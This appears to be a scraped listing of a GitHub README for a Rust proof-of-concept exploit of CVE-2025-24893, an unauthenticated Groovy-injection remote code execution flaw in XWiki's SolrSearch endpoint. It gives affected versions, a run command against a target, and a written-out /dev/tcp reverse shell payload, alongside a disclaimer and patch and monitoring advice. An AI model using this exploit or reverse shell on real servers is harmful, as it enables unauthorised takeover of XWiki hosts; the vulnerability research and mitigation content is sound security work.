来源

关联漏洞

描述

 Proof-of-Concept exploit for CVE-2025-24893, an unauthenticated Remote Code Execution (RCE) vulnerability in XWiki. Exploits a template injection flaw in the SolrSearch endpoint via Groovy script execution.

介绍

# CVE-2025-24893 — XWiki Unauthenticated RCE (PoC)

Proof-of-Concept exploit for **CVE-2025-24893**, a critical unauthenticated **Remote Code Execution** vulnerability in **XWiki**.  
This exploit abuses a Groovy template injection in the `SolrSearch` endpoint to execute arbitrary commands — including reverse shells — without authentication.

## 💥 Vulnerability Details

A flaw in how XWiki handles crafted input to the `SolrSearch` RSS endpoint allows attackers to inject Groovy code into the rendering pipeline.  
This enables **unauthenticated RCE** via `{{groovy}}` script blocks.

### ✅ Affected Versions

- `< 15.10.11`
- `>= 16.0.0` and `< 16.4.1`

### ❌ Fixed in

- `15.10.11`
- `16.4.1`

---

## 🔧 Usage

Download the release:

[Releases](https://github.com/investigato/cve-2025-24893-poc/releases/tag/v0.1.0)

or build from source:

```bash
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
```

### Reverse Shell Payload

There's a prebuilt reverse shell payload in this form:

`bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1`

---

## ⚠️ Legal Disclaimer

This code is for **educational and authorized security research only**.
Do **not** use this exploit against systems you do not own or have explicit permission to test.

---

## ✍️ Credits

- Exploit PoC by [Artemir7](https://github.com/Artemir7/CVE-2025-24893-EXP)
- Rust port by investigato

---

## 🛡️ Detection & Mitigation

- Update to **XWiki 15.10.11** or **16.4.1+**
- Monitor suspicious use of `/bin/get/Main/SolrSearch?media=rss`
- Disable Groovy execution for anonymous users if possible

文件快照

 [4.0K]  /data/pocs/ccf20b542b2e509842383ed9ab6a681e8b9a474f
├── [ 45K]  Cargo.lock
├── [ 424]  Cargo.toml
├── [1.6K]  README.md
└── [4.0K]  src
    └── [3.9K]  main.rs

1 directory, 4 files

备注